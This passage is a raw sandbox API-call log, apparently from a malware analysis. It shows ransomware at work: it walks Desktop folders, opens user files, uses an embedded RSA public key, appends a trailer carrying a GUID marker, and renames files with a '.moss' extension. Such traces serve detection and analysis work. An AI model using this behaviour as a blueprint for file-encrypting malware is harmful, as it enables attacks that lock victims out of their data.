| out: hHeap=0xcd0000) returned 1 [0170.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0170.195] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0170.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0170.196] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.196] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.196] CloseHandle (hObject=0x664) returned 1 [0170.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xd80bd8 [0170.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8a0) returned 0x3b4b098 [0170.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0170.197] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\ORl97 rSVzgg.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\orl97 rsvzgg.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\ORl97 rSVzgg.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\orl97 rsvzgg.m4a.moss")) returned 1 [0170.198] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.198] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.198] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.200] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3330 | out: hHeap=0xcd0000) returned 1 [0170.200] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ad55b40, ftCreationTime.dwHighDateTime=0x1d5d959, ftLastAccessTime.dwLowDateTime=0xb485a810, ftLastAccessTime.dwHighDateTime=0x1d5d9d4, ftLastWriteTime.dwLowDateTime=0xb485a810, ftLastWriteTime.dwHighDateTime=0x1d5d9d4, nFileSizeHigh=0x0, nFileSizeLow=0xf228, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zbdm9r2.bmp", cAlternateFileName="")) returned 1 [0170.200] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0170.200] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa6) returned 0x35e3330 [0170.200] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2840 | out: hHeap=0xcd0000) returned 1 [0170.200] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\zbdm9r2.bmp") returned=".bmp" [0170.200] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\zbdm9r2.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\zbdm9r2.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.200] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=61992) returned 1 [0170.200] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.203] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf202, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.203] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.204] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.205] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.205] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.205] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xf228, lpOverlapped=0x0) returned 1 [0170.205] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.205] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.205] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.205] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.205] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0170.206] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.207] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.207] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.207] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.207] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.207] GetLastError () returned 0x0 [0170.207] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.207] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0170.207] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.207] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.207] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.207] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.207] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.207] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.207] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.207] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xf230) returned 0x3b62d40 [0170.208] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0170.208] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4bff8 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc218 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4c040 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc230 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc260 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc278 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0170.208] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.208] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc260 | out: hHeap=0xcd0000) returned 1 [0170.208] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc278 | out: hHeap=0xcd0000) returned 1 [0170.208] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.208] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0170.208] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc278 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0170.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc260 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3b44690 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.209] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.209] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc278 | out: hHeap=0xcd0000) returned 1 [0170.209] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0170.209] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc260 | out: hHeap=0xcd0000) returned 1 [0170.209] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0170.209] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0170.209] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.209] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.209] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0170.209] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0170.209] GetCurrentThreadId () returned 0x324 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b49ec0 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0170.209] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.209] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.210] GetCurrentThreadId () returned 0x324 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.210] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35ceae8 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.210] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.210] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.210] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0170.210] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0170.210] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc260 [0170.210] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0170.210] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0170.210] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0170.211] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0170.211] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0170.211] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0170.211] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc278 [0170.211] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0170.211] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0170.211] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0170.211] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc248 [0170.211] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0170.211] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0170.211] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0170.211] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0170.212] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf228, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.212] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.212] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.212] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.212] CloseHandle (hObject=0x664) returned 1 [0170.213] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xd80bd8 [0170.213] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b4b098 [0170.214] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\zbdm9r2.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\zbdm9r2.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\zbdm9r2.bmp.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\zbdm9r2.bmp.moss")) returned 1 [0170.216] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ad55b40, ftCreationTime.dwHighDateTime=0x1d5d959, ftLastAccessTime.dwLowDateTime=0xb485a810, ftLastAccessTime.dwHighDateTime=0x1d5d9d4, ftLastWriteTime.dwLowDateTime=0xb485a810, ftLastWriteTime.dwHighDateTime=0x1d5d9d4, nFileSizeHigh=0x0, nFileSizeLow=0xf228, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zbdm9r2.bmp", cAlternateFileName="")) returned 0 [0170.217] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0170.217] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.217] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0170.217] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.217] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.217] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\") returned="xxuaxzQ\\" [0170.217] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.217] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0170.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0170.217] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4c040 [0170.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.217] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0170.217] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.217] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.217] PathFindFileNameW (pszPath="") returned="" [0170.218] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.218] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x952bfeb0, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x7579f170, ftLastAccessTime.dwHighDateTime=0x1d5dccd, ftLastWriteTime.dwLowDateTime=0x7579f170, ftLastWriteTime.dwHighDateTime=0x1d5dccd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0170.218] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x952bfeb0, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x7579f170, ftLastAccessTime.dwHighDateTime=0x1d5dccd, ftLastWriteTime.dwLowDateTime=0x7579f170, ftLastWriteTime.dwHighDateTime=0x1d5dccd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.218] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x705537b0, ftCreationTime.dwHighDateTime=0x1d5e784, ftLastAccessTime.dwLowDateTime=0xce208c00, ftLastAccessTime.dwHighDateTime=0x1d5d8d9, ftLastWriteTime.dwLowDateTime=0xce208c00, ftLastWriteTime.dwHighDateTime=0x1d5d8d9, nFileSizeHigh=0x0, nFileSizeLow=0xec1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2UgGdV0vuu.bmp", cAlternateFileName="2UGGDV~1.BMP")) returned 1 [0170.218] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.218] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0170.218] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\2UgGdV0vuu.bmp") returned=".bmp" [0170.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\2UgGdV0vuu.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\2uggdv0vuu.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.218] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=60447) returned 1 [0170.218] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 